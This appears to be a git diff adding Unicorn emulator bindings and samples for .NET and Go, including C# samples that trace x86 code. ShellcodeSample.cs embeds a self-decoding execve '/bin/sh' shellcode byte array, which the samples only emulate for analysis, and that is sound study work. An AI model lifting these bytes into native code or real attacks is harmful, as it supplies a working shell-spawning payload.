_memEventHooks.Keys + |> Seq.filter(fun eventFlag -> (eventType &&& eventFlag) <> 0) + |> Seq.iter(fun eventFlag -> _memEventHooks.[eventFlag].Add((callback, userData))) + + member this.AddEventMemHook(callback: EventMemHook, eventType: Int32) = + this.AddEventMemHook(callback, eventType, null) + + member this.HookDel(callback: EventMemHook) = + let callbacks = (_memEventHooks.Values |> Seq.concat).ToList() + hookDel callbacks callback + + member this.AddInHook(callback: InHook, userData: Object) = + let trampoline(u: IntPtr) (port: Int32) (size: Int32) (user: IntPtr) = + _inHooks + |> Seq.map(fun (callback, userData) -> callback.Invoke(this, port, size, userData)) + |> Seq.last + + if _inHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new InHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddArg0(_eng.[0], hh, Common.UC_HOOK_INSN, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 0, uint64 0, X86.UC_X86_INS_IN) |> this.CheckResult with + | Some e -> raise e | None -> () + + _inHooks.Add(callback, userData) + + member this.AddInHook(callback: InHook) = + this.AddInHook(callback, null) + + member this.AddOutHook(callback: OutHook, userData: Object) = + let trampoline(u: IntPtr) (port: Int32) (size: Int32) (value: Int32) (user: IntPtr) = + _outHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, port, size, value, userData)) + + if _outHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new OutHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddArg0(_eng.[0], hh, Common.UC_HOOK_INSN, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 0, uint64 0, X86.UC_X86_INS_OUT) |> this.CheckResult with + | Some e -> raise e | None -> () + + _outHooks.Add(callback, userData) + + member this.AddOutHook(callback: OutHook) = + this.AddOutHook(callback, null) + + member this.AddSyscallHook(callback: SyscallHook, userData: Object) = + let trampoline(u: IntPtr) (user: IntPtr) = + _syscallHooks + |> Seq.iter(fun (callback, userData) -> callback.Invoke(this, userData)) + + if _syscallHooks |> Seq.isEmpty then + let funcPointer = Marshal.GetFunctionPointerForDelegate(new SyscallHookInternal(trampoline)) + let hh = new UIntPtr(allocate(IntPtr.Size)) + match binding.HookAddArg0(_eng.[0], hh, Common.UC_HOOK_INSN, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 0, uint64 0, X86.UC_X86_INS_SYSCALL) |> this.CheckResult with + | Some e -> raise e | None -> () + + _syscallHooks.Add(callback, userData) + + member this.AddSyscallHook(callback: SyscallHook) = + this.AddSyscallHook(callback, null) + + member this.Version() = + let (major, minor) = (new UIntPtr(), new UIntPtr()) + let combined = binding.Version(major, minor) + (major.ToUInt32(), minor.ToUInt32(), combined) + + abstract Dispose : Boolean -> unit + default this.Dispose(disposing: Boolean) = + if (disposing) then + // free managed resources, this is the default dispose implementation pattern + () + + _disposablePointers + |> Seq.filter(fun pointer -> pointer <> IntPtr.Zero) + |> Seq.iter Marshal.FreeHGlobal + _disposablePointers.Clear() + + member this.Dispose() = + this.Dispose(true) + GC.SuppressFinalize(this) + + override this.Finalize() = + this.Dispose(false) + + interface IDisposable with + member this.Dispose() = + this.Dispose() \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/UnicornEngineException.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/UnicornEngineException.fs new file mode 100644 index 0000000..fd58255 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/UnicornEngineException.fs @@ -0,0 +1,9 @@ +namespace UnicornManaged + +open System + +type UnicornEngineException(errNo: Int32, msg: String) = + inherit ApplicationException(msg) + + member this.ErrorNo = errNo + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/UnicornManaged.fsproj b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/UnicornManaged.fsproj new file mode 100644 index 0000000..e10cd73 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/UnicornManaged.fsproj @@ -0,0 +1,87 @@ + + + + + Debug + AnyCPU + 2.0 + 0c21f1c1-2725-4a46-9022-1905f85822a5 + Library + UnicornManaged + UnicornManaged + v4.5 + 4.3.1.0 + true + UnicornManaged + + + + true + full + false + false + bin\Debug\ + DEBUG;TRACE + 3 + bin\Debug\UnicornManaged.XML + + + pdbonly + true + true + bin\Release\ + TRACE + 3 + bin\Release\UnicornManaged.XML + + + + + True + + + + + + + + + + + + + + + + + + + + + + + + + 11 + + + + + $(MSBuildExtensionsPath32)\..\Microsoft SDKs\F#\3.0\Framework\v4.0\Microsoft.FSharp.Targets + + + + + $(MSBuildExtensionsPath32)\Microsoft\VisualStudio\v$(VisualStudioVersion)\FSharp\Microsoft.FSharp.Targets + + + + + + \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/App.config b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/App.config new file mode 100644 index 0000000..d1428ad --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/App.config @@ -0,0 +1,6 @@ + + + + + + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Program.cs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Program.cs new file mode 100644 index 0000000..41cfb19 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Program.cs @@ -0,0 +1,23 @@ +using System; + +namespace UnicornSamples +{ + class Program + { + static void Main(string[] args) + { + // X86 tests 32bit + X86Sample32.X86Code32(); + X86Sample32.X86Code32InvalidMemRead(); + X86Sample32.X86Code32InvalidMemWriteWithRuntimeFix(); + X86Sample32.X86Code32InOut(); + + // Run all shellcode tests + ShellcodeSample.X86Code32Self(); + ShellcodeSample.X86Code32(); + + Console.Write("Tests completed"); + Console.ReadLine(); + } + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Properties/AssemblyInfo.cs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Properties/AssemblyInfo.cs new file mode 100644 index 0000000..aacf2f8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Properties/AssemblyInfo.cs @@ -0,0 +1,36 @@ +using System.Reflection; +using System.Runtime.CompilerServices; +using System.Runtime.InteropServices; + +// General Information about an assembly is controlled through the following +// set of attributes. Change these attribute values to modify the information +// associated with an assembly. +[assembly: AssemblyTitle("UnicornSamples")] +[assembly: AssemblyDescription("")] +[assembly: AssemblyConfiguration("")] +[assembly: AssemblyCompany("")] +[assembly: AssemblyProduct("UnicornSamples")] +[assembly: AssemblyCopyright("Copyright © Antonio Parata 2016")] +[assembly: AssemblyTrademark("")] +[assembly: AssemblyCulture("")] + +// Setting ComVisible to false makes the types in this assembly not visible +// to COM components. If you need to access a type in this assembly from +// COM, set the ComVisible attribute to true on that type. +[assembly: ComVisible(false)] + +// The following GUID is for the ID of the typelib if this project is exposed to COM +[assembly: Guid("b80b5987-1e24-4309-8bf9-c4f91270f21c")] + +// Version information for an assembly consists of the following four values: +// +// Major Version +// Minor Version +// Build Number +// Revision +// +// You can specify all the values or you can default the Build and Revision Numbers +// by using the '*' as shown below: +// [assembly: AssemblyVersion("1.0.*")] +[assembly: AssemblyVersion("1.0.0.0")] +[assembly: AssemblyFileVersion("1.0.0.0")] diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/ShellcodeSample.cs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/ShellcodeSample.cs new file mode 100644 index 0000000..be654d6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/ShellcodeSample.cs @@ -0,0 +1,195 @@ +using Gee.External.Capstone; +using Gee.External.Capstone.X86; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.Linq; +using System.Reflection; +using System.Text; +using System.Threading.Tasks; +using UnicornManaged; +using UnicornManaged.Const; + +namespace UnicornSamples +{ + internal class ShellcodeSample + { + private const Int64 ADDRESS = 0x1000000; + + public static void X86Code32Self() + { + Byte[] X86_CODE32_SELF = + { + 0xeb, 0x1c, 0x5a, 0x89, 0xd6, 0x8b, 0x02, 0x66, 0x3d, 0xca, 0x7d, 0x75, 0x06, 0x66, 0x05, 0x03, 0x03, + 0x89, 0x02, 0xfe, 0xc2, 0x3d, 0x41, 0x41, 0x41, 0x41, 0x75, 0xe9, 0xff, 0xe6, 0xe8, 0xdf, 0xff, 0xff, + 0xff, 0x31, 0xd2, 0x6a, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, + 0x6e, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xca, 0x7d, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 + }; + + Run(X86_CODE32_SELF); + } + + public static void X86Code32() + { + Byte[] X86_CODE32 = + { + 0xeb, 0x19, 0x31, 0xc0, 0x31, 0xdb, 0x31, 0xd2, 0x31, 0xc9, 0xb0, 0x04, 0xb3, 0x01, 0x59, 0xb2, 0x05, + 0xcd, 0x80, 0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80, 0xe8, 0xe2, 0xff, 0xff, 0xff, 0x68, 0x65, + 0x6c, 0x6c, 0x6f + }; + + Run(X86_CODE32); + } + + private static void Run(Byte[] code) + { + Console.WriteLine(); + var stackTrace = new StackTrace(); + var stackFrame = stackTrace.GetFrames()[1]; + var methodName = stackFrame.GetMethod().Name; + + Console.WriteLine("*** Start: " + methodName); + RunTest(code, ADDRESS); + Console.WriteLine("*** End: " + methodName); + Console.WriteLine(); + } + + + private static void RunTest(Byte[] code, Int64 address) + { + try + { + using (var u = new Unicorn(Common.UC_ARCH_X86, Common.UC_MODE_32)) + using(var disassembler = CapstoneDisassembler.CreateX86Disassembler(DisassembleMode.Bit32)) + { + Console.WriteLine("Unicorn version: {0}", u.Version()); + + // map 2MB of memory for this emulation + u.MemMap(address, 2 * 1024 * 1024, Common.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.MemWrite(address, code); + + // initialize machine registers + u.RegWrite(X86.UC_X86_REG_ESP, Utils.Int64ToBytes(address + 0x200000)); + + var regv = new Byte[4]; + u.RegRead(X86.UC_X86_REG_ESP, regv); + + // tracing all instructions by having @begin > @end + u.AddCodeHook((uc, addr, size, userData) => CodeHookCallback(disassembler, uc, addr, size, userData), 1, 0); + + // handle interrupt ourself + u.AddInterruptHook(InterruptHookCallback); + + // handle SYSCALL + u.AddSyscallHook(SyscallHookCallback); + + Console.WriteLine(">>> Start tracing code"); + + // emulate machine code in infinite time + u.EmuStart(address, address + code.Length, 0u, 0u); + + Console.WriteLine(">>> Emulation Done!"); + } + } + catch (UnicornEngineException ex) + { + Console.Error.WriteLine("Emulation FAILED! " + ex.Message); + } + } + + private static void CodeHookCallback( + CapstoneDisassembler disassembler, + Unicorn u, + Int64 addr, + Int32 size, + Object userData) + { + Console.Write("[+] 0x{0}: ", addr.ToString("X")); + + var eipBuffer = new Byte[4]; + u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); + + var effectiveSize = Math.Min(16, size); + var tmp = new Byte[effectiveSize]; + u.MemRead(addr, tmp); + + var sb = new StringBuilder(); + foreach (var t in tmp) + { + sb.AppendFormat("{0} ", (0xFF & t).ToString("X")); + } + Console.Write("{0,-20}", sb); + Console.WriteLine(Utils.Disassemble(disassembler, tmp)); + } + + private static void SyscallHookCallback(Unicorn u, Object userData) + { + var eaxBuffer = new Byte[4]; + u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); + var eax = Utils.ToInt(eaxBuffer); + + Console.WriteLine("[!] Syscall EAX = 0x{0}", eax.ToString("X")); + + u.EmuStop(); + } + + private static void InterruptHookCallback(Unicorn u, Int32 intNumber, Object userData) + { + // only handle Linux syscall + if (intNumber != 0x80) + { + return; + } + + var eaxBuffer = new Byte[4]; + var eipBuffer = new Byte[4]; + + u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); + u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); + + var eax = Utils.ToInt(eaxBuffer); + var eip = Utils.ToInt(eipBuffer); + + switch (eax) + { + default: + Console.WriteLine("[!] Interrupt 0x{0} num {1}, EAX=0x{2}", eip.ToString("X"), intNumber.ToString("X"), eax.ToString("X")); + break; + case 1: // sys_exit + Console.WriteLine("[!] Interrupt 0x{0} num {1}, SYS_EXIT", eip.ToString("X"), intNumber.ToString("X")); + u.EmuStop(); + break; + case 4: // sys_write + + // ECX = buffer address + var ecxBuffer = new Byte[4]; + + // EDX = buffer size + var edxBuffer = new Byte[4]; + + u.RegRead(X86.UC_X86_REG_ECX, ecxBuffer); + u.RegRead(X86.UC_X86_REG_EDX, edxBuffer); + + var ecx = Utils.ToInt(ecxBuffer); + var edx = Utils.ToInt(edxBuffer); + + // read the buffer in + var size = Math.Min(256, edx); + var buffer = new Byte[size]; + u.MemRead(ecx, buffer); + var content = Encoding.Default.GetString(buffer); + + Console.WriteLine( + "[!] Interrupt 0x{0}: num {1}, SYS_WRITE. buffer = 0x{2}, size = , content = '{3}'", + eip.ToString("X"), + ecx.ToString("X"), + edx.ToString("X"), + content); + + break; + } + } + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/UnicornSamples.csproj b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/UnicornSamples.csproj new file mode 100644 index 0000000..3a087b0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/UnicornSamples.csproj @@ -0,0 +1,108 @@ + + + + + Debug + AnyCPU + {B80B5987-1E24-4309-8BF9-C4F91270F21C} + Exe + Properties + UnicornSamples + UnicornSamples + v4.5 + 512 + true + + publish\ + true + Disk + false + Foreground + 7 + Days + false + false + true + 0 + 1.0.0.%2a + false + false + true + + + x86 + true + full + false + bin\Debug\ + DEBUG;TRACE + prompt + 4 + false + false + + + AnyCPU + pdbonly + true + bin\Release\ + TRACE + prompt + 4 + + + + ..\packages\Gee.External.Capstone.1.2.2\lib\net45\Gee.External.Capstone.dll + True + + + + + + + + + + + + + + + + + + + + + + + + False + Microsoft .NET Framework 4.5 %28x86 and x64%29 + true + + + False + .NET Framework 3.5 SP1 + false + + + + + {0c21f1c1-2725-4a46-9022-1905f85822a5} + UnicornManaged + + + + + + + + + \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Utils.cs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Utils.cs new file mode 100644 index 0000000..1f4d287 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/Utils.cs @@ -0,0 +1,47 @@ +using Gee.External.Capstone; +using Gee.External.Capstone.X86; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; +using System.Threading.Tasks; + +namespace UnicornSamples +{ + internal static class Utils + { + public static Int64 ToInt(Byte[] val) + { + UInt64 res = 0; + for (var i = 0; i < val.Length; i++) + { + var v = val[i] & 0xFF; + res += (UInt64)(v << (i * 8)); + } + return (Int64)res; + } + + public static Byte[] Int64ToBytes(Int64 intVal) + { + var res = new Byte[8]; + var uval = (UInt64)intVal; + for (var i = 0; i < res.Length; i++) + { + res[i] = (Byte)(uval & 0xff); + uval = uval >> 8; + } + return res; + } + + public static String Disassemble(CapstoneDisassembler disassembler, Byte[] code) + { + var sb = new StringBuilder(); + var instructions = disassembler.DisassembleAll(code); + foreach (var instruction in instructions) + { + sb.AppendFormat("{0} {1}{2}", instruction.Mnemonic, instruction.Operand, Environment.NewLine); + } + return sb.ToString().Trim(); + } + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/X86Sample32.cs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/X86Sample32.cs new file mode 100644 index 0000000..6bcd830 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/X86Sample32.cs @@ -0,0 +1,328 @@ +using Gee.External.Capstone; +using Gee.External.Capstone.X86; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.Linq; +using System.Reflection; +using System.Text; +using System.Threading.Tasks; +using UnicornManaged; +using UnicornManaged.Const; + +namespace UnicornSamples +{ + internal class X86Sample32 + { + private const Int64 ADDRESS = 0x1000000; + + public static void X86Code32() + { + Byte[] X86_CODE32 = + { + // INC ecx; DEC edx + 0x41, 0x4a + }; + Run(X86_CODE32); + } + + public static void X86Code32InvalidMemRead() + { + Byte[] X86_CODE32_MEM_READ = + { + // mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx + 0x8B, 0x0D, 0xAA, 0xAA, 0xAA, 0xAA, 0x41, 0x4a + }; + Run(X86_CODE32_MEM_READ); + } + + public static void X86Code32InvalidMemWriteWithRuntimeFix() + { + Byte[] X86_CODE32_MEM_WRITE = + { + // mov [0xaaaaaaaa], ecx; INC ecx; DEC edx + 0x89, 0x0D, 0xAA, 0xAA, 0xAA, 0xAA, 0x41, 0x4a + }; + Run(X86_CODE32_MEM_WRITE); + } + + public static void X86Code32InOut() + { + Byte[] X86_CODE32_INOUT = + { + // INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx + 0x41, 0xE4, 0x3F, 0x4a, 0xE6, 0x46, 0x43 + }; + Run(X86_CODE32_INOUT); + } + + + private static void Run(Byte[] code, Boolean raiseException = false) + { + Console.WriteLine(); + var stackTrace = new StackTrace(); + var stackFrame = stackTrace.GetFrames()[1]; + var methodName = stackFrame.GetMethod().Name; + + Console.WriteLine("*** Start: " + methodName); + Exception e = null; + try + { + RunTest(code, ADDRESS, Common.UC_MODE_32); + } + catch (UnicornEngineException ex) + { + e = ex; + } + + if (!raiseException && e != null) + { + Console.Error.WriteLine("Emulation FAILED! " + e.Message); + } + + Console.WriteLine("*** End: " + methodName); + Console.WriteLine(); + } + + private static void RunTest(Byte[] code, Int64 address, Int32 mode) + { + using (var u = new Unicorn(Common.UC_ARCH_X86, mode)) + using (var disassembler = CapstoneDisassembler.CreateX86Disassembler(DisassembleMode.Bit32)) + { + Console.WriteLine("Unicorn version: {0}", u.Version()); + + // map 2MB of memory for this emulation + u.MemMap(address, 2 * 1024 * 1024, Common.UC_PROT_ALL); + + // initialize machine registers + u.RegWrite(X86.UC_X86_REG_EAX, 0x1234); + u.RegWrite(X86.UC_X86_REG_ECX, 0x1234); + u.RegWrite(X86.UC_X86_REG_EDX, 0x7890); + + // write machine code to be emulated to memory + u.MemWrite(address, code); + + // initialize machine registers + u.RegWrite(X86.UC_X86_REG_ESP, Utils.Int64ToBytes(address + 0x200000)); + + // handle IN & OUT instruction + u.AddInHook(InHookCallback); + u.AddOutHook(OutHookCallback); + + // tracing all instructions by having @begin > @end + u.AddCodeHook((uc, addr, size, userData) => CodeHookCallback(disassembler, uc, addr, size, userData), 1, 0); + + // handle interrupt ourself + u.AddInterruptHook(InterruptHookCallback); + + // handle SYSCALL + u.AddSyscallHook(SyscallHookCallback); + + // intercept invalid memory events + u.AddEventMemHook(MemMapHookCallback, Common.UC_HOOK_MEM_READ_UNMAPPED | Common.UC_HOOK_MEM_WRITE_UNMAPPED); + + Console.WriteLine(">>> Start tracing code"); + + // emulate machine code in infinite time + u.EmuStart(address, address + code.Length, 0u, 0u); + + // print registers + var ecx = u.RegRead(X86.UC_X86_REG_ECX); + var edx = u.RegRead(X86.UC_X86_REG_EDX); + var eax = u.RegRead(X86.UC_X86_REG_EAX); + Console.WriteLine("[!] EAX = {0}", eax.ToString("X")); + Console.WriteLine("[!] ECX = {0}", ecx.ToString("X")); + Console.WriteLine("[!] EDX = {0}", edx.ToString("X")); + + Console.WriteLine(">>> Emulation Done!"); + } + } + + private static Int32 InHookCallback(Unicorn u, Int32 port, Int32 size, Object userData) + { + var eip = u.RegRead(X86.UC_X86_REG_EIP); + Console.WriteLine("[!] Reading from port 0x{0}, size: {1}, address: 0x{2}", port.ToString("X"), size.ToString("X"), eip.ToString("X")); + var res = 0; + switch (size) + { + case 1: + // read 1 byte to AL + res = 0xf1; + break; + case 2: + // read 2 byte to AX + res = 0xf2; + break; + case 4: + // read 4 byte to EAX + res = 0xf4; + break; + } + + Console.WriteLine("[!] Return value: {0}", res.ToString("X")); + return res; + } + + private static void OutHookCallback(Unicorn u, Int32 port, Int32 size, Int32 value, Object userData) + { + var eip = u.RegRead(X86.UC_X86_REG_EIP); + Console.WriteLine("[!] Writing to port 0x{0}, size: {1}, value: 0x{2}, address: 0x{3}", port.ToString("X"), size.ToString("X"), value.ToString("X"), eip.ToString("X")); + + // confirm that value is indeed the value of AL/ AX / EAX + var v = 0L; + var regName = String.Empty; + switch (size) + { + case 1: + // read 1 byte in AL + v = u.RegRead(X86.UC_X86_REG_AL); + regName = "AL"; + break; + case 2: + // read 2 byte in AX + v = u.RegRead(X86.UC_X86_REG_AX); + regName = "AX"; + break; + case 4: + // read 4 byte in EAX + v = u.RegRead(X86.UC_X86_REG_EAX); + regName = "EAX"; + break; + } + + Console.WriteLine("[!] Register {0}: {1}", regName, v.ToString("X")); + } + + private static Boolean MemMapHookCallback(Unicorn u, Int32 eventType, Int64 address, Int32 size, Int64 value, Object userData) + { + if (eventType == Common.UC_MEM_WRITE_UNMAPPED) + { + Console.WriteLine("[!] Missing memory is being WRITE at 0x{0}, data size = {1}, data value = 0x{2}. Map memory.", address.ToString("X"), size.ToString("X"), value.ToString("X")); + u.MemMap(0xaaaa0000, 2 * 1024 * 1024, Common.UC_PROT_ALL); + return true; + } + else + { + return false; + } + } + + private static void CodeHookCallback1( + CapstoneDisassembler disassembler, + Unicorn u, + Int64 addr, + Int32 size, + Object userData) + { + Console.Write("[+] 0x{0}: ", addr.ToString("X")); + + var eipBuffer = new Byte[4]; + u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); + + var effectiveSize = Math.Min(16, size); + var tmp = new Byte[effectiveSize]; + u.MemRead(addr, tmp); + + var sb = new StringBuilder(); + foreach (var t in tmp) + { + sb.AppendFormat("{0} ", (0xFF & t).ToString("X")); + } + Console.Write("{0,-20}", sb); + Console.WriteLine(Utils.Disassemble(disassembler, tmp)); + } + + private static void CodeHookCallback( + CapstoneDisassembler disassembler, + Unicorn u, + Int64 addr, + Int32 size, + Object userData) + { + Console.Write("[+] 0x{0}: ", addr.ToString("X")); + + var eipBuffer = new Byte[4]; + u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); + + var effectiveSize = Math.Min(16, size); + var tmp = new Byte[effectiveSize]; + u.MemRead(addr, tmp); + + var sb = new StringBuilder(); + foreach (var t in tmp) + { + sb.AppendFormat("{0} ", (0xFF & t).ToString("X")); + } + Console.Write("{0,-20}", sb); + Console.WriteLine(Utils.Disassemble(disassembler, tmp)); + } + + private static void SyscallHookCallback(Unicorn u, Object userData) + { + var eaxBuffer = new Byte[4]; + u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); + var eax = Utils.ToInt(eaxBuffer); + + Console.WriteLine("[!] Syscall EAX = 0x{0}", eax.ToString("X")); + + u.EmuStop(); + } + + private static void InterruptHookCallback(Unicorn u, Int32 intNumber, Object userData) + { + // only handle Linux syscall + if (intNumber != 0x80) + { + return; + } + + var eaxBuffer = new Byte[4]; + var eipBuffer = new Byte[4]; + + u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); + u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); + + var eax = Utils.ToInt(eaxBuffer); + var eip = Utils.ToInt(eipBuffer); + + switch (eax) + { + default: + Console.WriteLine("[!] Interrupt 0x{0} num {1}, EAX=0x{2}", eip.ToString("X"), intNumber.ToString("X"), eax.ToString("X")); + break; + case 1: // sys_exit + Console.WriteLine("[!] Interrupt 0x{0} num {1}, SYS_EXIT", eip.ToString("X"), intNumber.ToString("X")); + u.EmuStop(); + break; + case 4: // sys_write + + // ECX = buffer address + var ecxBuffer = new Byte[4]; + + // EDX = buffer size + var edxBuffer = new Byte[4]; + + u.RegRead(X86.UC_X86_REG_ECX, ecxBuffer); + u.RegRead(X86.UC_X86_REG_EDX, edxBuffer); + + var ecx = Utils.ToInt(ecxBuffer); + var edx = Utils.ToInt(edxBuffer); + + // read the buffer in + var size = Math.Min(256, edx); + var buffer = new Byte[size]; + u.MemRead(ecx, buffer); + var content = Encoding.Default.GetString(buffer); + + Console.WriteLine( + "[!] Interrupt 0x{0}: num {1}, SYS_WRITE. buffer = 0x{2}, size = , content = '{3}'", + eip.ToString("X"), + ecx.ToString("X"), + edx.ToString("X"), + content); + + break; + } + } + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/packages.config b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/packages.config new file mode 100644 index 0000000..d4215ee --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornSamples/packages.config @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/Makefile b/ai_anti_malware/unicorn/unicorn-master/bindings/go/Makefile new file mode 100644 index 0000000..fe898ae --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/Makefile @@ -0,0 +1,12 @@ +# Go binding for Unicorn engine. Ryan Hileman + +.PHONY: all gen_const test + +all: gen_const + cd unicorn && go build + +gen_const: + cd .. && python const_generator.py go + +test: all + cd unicorn && LD_LIBRARY_PATH=../../../ DYLD_LIBRARY_PATH=../../../ go test diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/README.md b/ai_anti_malware/unicorn/unicorn-master/bindings/go/README.md new file mode 100644 index 0000000..3433dad --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/README.md @@ -0,0 +1,29 @@ +To download/update the Unicorn Go bindings, run: + + go get -u github.com/unicorn-engine/unicorn/bindings/go + +A very basic usage example follows + +_(Does not handle most errors for brevity. Please see sample.go for a more hygenic example):_ + + package main + + import ( + "fmt" + uc "github.com/unicorn-engine/unicorn/bindings/go/unicorn" + ) + + func main() { + mu, _ := uc.NewUnicorn(uc.ARCH_X86, uc.MODE_32) + // mov eax, 1234 + code := []byte{184, 210, 4, 0, 0} + mu.MemMap(0x1000, 0x1000) + mu.MemWrite(0x1000, code) + if err := mu.Start(0x1000, 0x1000+uint64(len(code))); err != nil { + panic(err) + } + eax, _ := mu.RegRead(uc.X86_REG_EAX) + fmt.Printf("EAX is now: %d\n", eax) + } + +An example program exercising far more Unicorn functionality and error handling can be found in sample.go. diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/sample.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/sample.go new file mode 100644 index 0000000..6c66ace --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/sample.go @@ -0,0 +1,105 @@ +package main + +import ( + "encoding/hex" + "fmt" + uc "github.com/unicorn-engine/unicorn/bindings/go/unicorn" + "strings" +) + +var asm = strings.Join([]string{ + "48c7c003000000", // mov rax, 3 + "0f05", // syscall + "48c7c700400000", // mov rdi, 0x4000 + "488907", // mov [rdi], rdx + "488b07", // mov rdx, [rdi] + "4883c201", // add rdx, 1 +}, "") + +func addHooks(mu uc.Unicorn) { + mu.HookAdd(uc.HOOK_BLOCK, func(mu uc.Unicorn, addr uint64, size uint32) { + fmt.Printf("Block: 0x%x, 0x%x\n", addr, size) + }, 1, 0) + mu.HookAdd(uc.HOOK_CODE, func(mu uc.Unicorn, addr uint64, size uint32) { + fmt.Printf("Code: 0x%x, 0x%x\n", addr, size) + }, 1, 0) + mu.HookAdd(uc.HOOK_MEM_READ|uc.HOOK_MEM_WRITE, func(mu uc.Unicorn, access int, addr uint64, size int, value int64) { + if access == uc.MEM_WRITE { + fmt.Printf("Mem write") + } else { + fmt.Printf("Mem read") + } + fmt.Printf(": @0x%x, 0x%x = 0x%x\n", addr, size, value) + }, 1, 0) + invalid := uc.HOOK_MEM_READ_INVALID | uc.HOOK_MEM_WRITE_INVALID | uc.HOOK_MEM_FETCH_INVALID + mu.HookAdd(invalid, func(mu uc.Unicorn, access int, addr uint64, size int, value int64) bool { + switch access { + case uc.MEM_WRITE_UNMAPPED | uc.MEM_WRITE_PROT: + fmt.Printf("invalid write") + case uc.MEM_READ_UNMAPPED | uc.MEM_READ_PROT: + fmt.Printf("invalid read") + case uc.MEM_FETCH_UNMAPPED | uc.MEM_FETCH_PROT: + fmt.Printf("invalid fetch") + default: + fmt.Printf("unknown memory error") + } + fmt.Printf(": @0x%x, 0x%x = 0x%x\n", addr, size, value) + return false + }, 1, 0) + mu.HookAdd(uc.HOOK_INSN, func(mu uc.Unicorn) { + rax, _ := mu.RegRead(uc.X86_REG_RAX) + fmt.Printf("Syscall: %d\n", rax) + }, 1, 0, uc.X86_INS_SYSCALL) +} + +func run() error { + code, err := hex.DecodeString(asm) + if err != nil { + return err + } + // set up unicorn instance and add hooks + mu, err := uc.NewUnicorn(uc.ARCH_X86, uc.MODE_64) + if err != nil { + return err + } + addHooks(mu) + // map and write code to memory + if err := mu.MemMap(0x1000, 0x1000); err != nil { + return err + } + if err := mu.MemWrite(0x1000, code); err != nil { + return err + } + // map scratch 